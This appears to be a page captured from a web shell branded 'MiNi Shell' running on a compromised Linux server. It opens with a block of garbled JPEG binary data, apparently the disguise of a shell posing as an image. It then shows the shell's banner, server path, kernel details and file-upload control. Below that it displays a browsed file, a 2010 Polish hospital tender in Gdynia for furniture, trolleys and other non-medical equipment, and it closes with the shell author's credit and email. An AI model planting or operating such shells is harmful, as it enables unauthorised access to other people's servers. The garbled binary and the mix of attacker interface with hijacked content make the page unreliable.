JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/162617-N-2010.html

<p class="kh_header"><b>Gdynia: dostawa fabrycznie nowego sprzętu niemedycznego i mebli dla partnerów projektu: Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku</b><br>
<b>Numer ogłoszenia: 162617 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Miejski im. J. Brudzińskiego , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 058 6207501, faks 058 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpitalmieski-gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa fabrycznie nowego sprzętu niemedycznego i mebli dla partnerów projektu: Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa fabrycznie nowego sprzętu niemedycznego i mebli dla partnerów projektu: Szpitala Miejskiego im. J. Brudzińskiego w Gdyni oraz Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku, wraz z instalacją, montażem, gwarancją i serwisem pogwarancyjnym, w ramach projektu partnerskiego Modernizacja i wyposażenie oddziałów udarowych i rehabilitacji neurologicznej oraz realizacja zadań profilaktyczno- szkoleniowych dla trzech szpitali woj. pomorskiego: w Gdańsku, Gdyni i Słupsku, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego 2007-2013, w podziale na 20 pakietów (części), w tym:
Pakiety dla Szpitala Miejskiego im. J. Brudzińskiego - od 1-7,
Pakiety dla Pomorskiego Centrum Traumatologii Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Gdańsku - od 8-20.

1) pakiet 1. meble:
a)	pakiet 1. 1. biurko lekarskie z kontenerem wyjezdnym szt. 7
b)	pakiet 1. 2. : fotel tapicerowany szt. 2
c)	pakiet 1. 3. : kanapa rozkładana szt. 1
d)	pakiet 1. 4. : stolik okolicznościowy szt. 1
e)	pakiet 1. 5. : szafa biurowa szt. 4
f)	pakiet 1. 6. : szafa biurowa szt. 1
g)	pakiet 1. 7. :  szafa garderobiana szt. 4
h)	pakiet 1. 8. :   szafka otwarta niska z półkami - 1 szt.
i)	pakiet 1. 9. : szafka z umywalką blatową i miejscem na podblatową lodówkę (do gabinetu diagnostyczno zabiegowego) - szt. 1 
j)	pakiet 1. 10. :   szafka zamykana niska - szt. 1
k)	pakiet 1. 11. : krzesło obrotowe z oparciem na ręce - szt. 10
l)	pakiet 1. 12. : taboret obrotowy szt. 4
m)	pakiet 1. 13. : szafa medyczna jednoskrzydłowa ze szklanymi drzwiami szt. 2
n)	pakiet 1. 14. : indywidualny zestaw mebli dla gabinetu zabiegowego - 1 zestaw
o)	pakiet 1.15. indywidualny zestaw mebli dla punktu pielęgniarskiego z punktem socjalnym - 1 zestaw
2) pakiet 2
a)	Pakiet 2.1. : wózek do brudnej bielizny - szt 1
b)	pakiet 2. 2. : wózek do czystej bielizny - szt. 1
c)	pakiet 2. 3. : wózek do dystrybucji leków - szt. 1
d)	pakiet 2. 4. : wózek zabiegowo-opatrunkowy - szt. 1
3) pakiet 3
a)	pakiet 3. 1. : wózek do mycia chorych ze sterowaniem hydraulicznym - 1 szt. 
b)	pakiet 3. 2. : wózek do przewożenia chorych w poz. leżącej - 2szt.
c)	pakiet 3. 3. : wózek inwalidzki dla chorych z hemiplegią - 2 szt. 
d)	pakiet 3. 4. : wózek inwalidzki pokojowy - 12 szt. 
e)	pakiet 3. 5. : wózek inwalidzki toaletowy - 1 szt. 
f)	pakiet 3. 6. : wózek inwalidzki ze stabilizacją pleców i głowy - 4 szt. 
4) pakiet 4. : chłodziarka laboratoryjno-medyczna jednoskrzydłowa ze szklanymi drzwiami - szt. 2
5) pakiet 5. : myjnia dezynfektor do basenów - 1 szt. 
6) pakiet 6. : waga osobowo-lekarska ze wzrostomierzem- 1 szt. 
7) pakiet 7. :   zestaw (stanowisko) do ćwiczeń manipulacyjnych - 1 szt. 
8) pakiet 8
a)	Pakiet 8.1  biurko lekarskie z kontenerem wyjezdnym - 4- szt. 
b)	pakiet 8. 2. :  fotel tapicerowany - 5 szt. 
c)	pakiet 8. 3. :  indywidualny zestaw mebli dla gabinetu zabiegowego1 -
                                1 komplet
d)	pakiet 8. 4. :  indywidualny zestaw mebli dla gabinetu zabiegowego2- 
                                1 komplet
e)	pakiet 8. 5. :  indywidualny zestaw mebli dla punktu pielęgniarskiego z punktem pielęgniarskim 1 -1 komplet 
f)	pakiet 8. 6. :  indywidualny zestaw mebli dla punktu pielęgniarskiego z punktem pielęgniarskim 2 -1 komplet 
g)	pakiet 8. 7. :  indywidualny zestaw mebli dla punktu pielęgniarskiego z punktem pielęgniarskim 4 -1 komplet 
h)	pakiet 8. 8. :  indywidualny zestaw mebli dla punktu pielęgniarskiego z punktem pielęgniarskim 3- 1 komplet  
i)	pakiet 8. 9. :  indywidualny zestaw mebli do gabinetu lekarskiego2 -
                                    1 komplet 
j)	pakiet 8. 10. :  indywidualny zestaw mebli do gabinetu lekarskiego 3 -
                                  1 komplet
k)	pakiet 8. 11. :  indywidualny zestaw mebli do gabinetu lekarskiego 1-
                                  1 komplet  
l)	pakiet 8. 12. :  indywidualny zestaw mebli do gabinetu lekarskiego 4 -
                                  1 komplet   
m)	pakiet 8. 13. :  kanapa rozkładana - 1 komplet  
n)	pakiet 8. 14. :  krzesło obrotowe z oparciem na ręce 10 szt. 
o)	pakiet 8. 15. :  krzesło zwykłe tapicerowane - zmywalne 36 szt. 
p)	pakiet 8. 16. :  lustro 2 szt. 
q)	pakiet 8. 17. :  lustro 16 szt.
r)	pakiet 8. 18. :   szafa metalowa 4-elementowa 6 szt.
s)	pakiet 8. 19. :   szafki z blachy nierdzewnej 20 szt. 
t)	pakiet 8. 20. :  taboret obrotowy 20 szt. 
u)	pakiet 8. 21. :  uchwyty dla osób niepełnosprawnych 20 szt. 
9) pakiet 9. : chłodziarka laboratoryjno-medyczna jednoskrzydłowa ze szklanymi drzwiami - 5 szt.
10) pakiet 10
a)	Pakiet 10.1. :  dozownik na mydło bezdotykowy - 4 szt. 
b)	pakiet 10. 2. :  dozownik na mydło - 36 szt. 
c)	pakiet 10. 3. :  dozownik na ręczniki - 36 szt. 
d)	pakiet 10. 4. :  dozowniki na środki dezynfekcyjne - 36 szt.
e)	pakiet 10. 5. :  dozownik na środek dezynfekcyjny bezdotykowy - 4 szt.
f)	pakiet 10. 6. :  wieszak papieru toaletowego - 6 szt. 
g)	pakiet 10. 7. :  wieszak - 6 szt. 
h)	pakiet 10. 8. :  wieszak - 4 szt. 
11) pakiet 11
a)	pakiet 11.1. :  fotel do pobierania krwi - 2 szt. 
b)	pakiet 11. 2. :  kozetka lekarska - 2 szt. 
c)	pakiet 11. 3. :  stolik zabiegowy- 2 szt. 
12) pakiet 12. :   myjnia dezynfektor do basenów - 2 szt. 
13) pakiet 13. :  regał stalowy na kaczki i baseny- 2 szt. 
14) pakiet 14
a)	Pakiet 14.1. :  rolety - 32 szt. 
b)	pakiet 14. 2. :  zasłony prysznicowe z obręczami - 6 szt. 
15) pakiet 15
a)	pakiet 15. 1. :  szkielet miniaturowy - model z zaznaczonymi przyczepami mięśni - 1 szt. 
b)	pakiet 15. 2. :  tablice anatomiczo - dydaktyczne: mózg, szkielet, system nerwowy, układ mięśniowy człowieka - 2 szt. 
16) pakiet 16. :  waga osobowo - lekarska ze wzrostomierzem - 2 szt. 
17) pakiet 17. :  wiadro pedałowe - 40 szt. 
18) pakiet 18
a)	pakiet 18.1.   wózek do brudnej bielizny - 5 szt.
b)	pakiet 18. 2. :  wózek do czystej bielizny - 2 szt. 
c)	pakiet 18. 3. :  wózek do przewożenia chorych z regulowaną wysokością - 2 szt. 
d)	pakiet 18. 4. :  wózek do dystrybucji leków - 2 szt. 
e)	pakiet 18. 5. :  wózek do rozwożenia leków - 3 szt. 
f)	pakiet 18.6 - wózek do rozwożenia posiłków - 2 szt.
19) pakiet 19
a)	Pakiet 19.1. :  wózek do mycia chorych ze sterowaniem hydraulicznym - 1 szt.
b)	pakiet 19. 2. :  wózek inwalidzki dla chorych z hemiplegią - 2 szt. 
c)	pakiet 19. 3. :  wózek inwalidzki pokojowy - 12 szt. 
d)	pakiet 19. 4. :  wózek inwalidzki toaletowy - 2 szt. 
e)	pakiet 19. 5. :  wózek inwalidzki ze stabilizacją pleców i głowy - 4 szt. 
f)	pakiet 19. 6. :   wózek reanimacyjny - 1 szt. 
g)	pakiet 19. 7. :  wózek wielofunkcyjny modułowy - 2 szt. 
h)	pakiet 19. 8. :  wózek zabiegowo-opatrunkowy -3 szt. 
20) pakiet 20 
a)	pakiet 20.1. :  zestaw (stanowisko)  ćwiczeń manipulacyjnych- 2 szt. 
b)	pakiet 20. 2. :  zestaw (stanowisko)  ćwiczeń manipulacyjnych - 2 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 39.10.00.00-3, 39.15.00.00-8, 33.19.30.00-9, 39.83.17.00-3, 39.29.93.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w  postępowaniu nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z ofertą</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w
postępowaniu nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z
ofertą</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w
postępowaniu nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z
ofertą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w
postępowaniu nastąpi na podstawie oświadczenia, przedłożonego przez wykonawcę wraz z
ofertą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany zawartej umowy będą wymagały pisemnego aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Zmiany umowy mogą dotyczyć:
1)	terminu realizacji zamówienia
2)	warunków płatności
3)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT
4)	zmiany modelu oferowanego sprzętu w przypadku wycofania z produkcji i zastąpienia go modelem nowszym
2. Zmiany, o których mowa w ust. 1 mogą być dokonane w następujących przypadkach:
	1) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
	2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy
3) w razie ustawowej zmiany stawki podatku od towarów i usług (VAT),
4) w przypadku zmiany obowiązujących przepisów prawa w zakresie dotyczącym przedmiotu umowy, wymagających dostosowania się zamawiającego lub wykonawcy do wprowadzonych zmian,
5) w przypadkach określonych we wzorze umowy.
3. Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski-gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. lub:
Szpital Miejski im. J.
Brudzińskiego ul. Wójta Radkego 1, 81-348 Gdynia, Dział ds. Zamówień Publicznych budynek
gospodarczy pok. 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2010 godzina 10:00, miejsce: w siedzibie Szpitala Miejskiego im. J. Brudzińskiego, ul. Wójta Radtkego 1, 81-348 Gdynia, Dział ds. zamówień publicznych, pok. nr 11 budynek gospodarczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Modernizacja i wyposażenie oddziałów udarowych i rehabilitacji neurologicznej oraz
realizacja zadań profilaktyczno- szkoleniowych dla trzech szpitali woj. pomorskiego: w Gdańsku, Gdyni i
Słupsku, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego
Programu Operacyjnego Województwa Pomorskiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com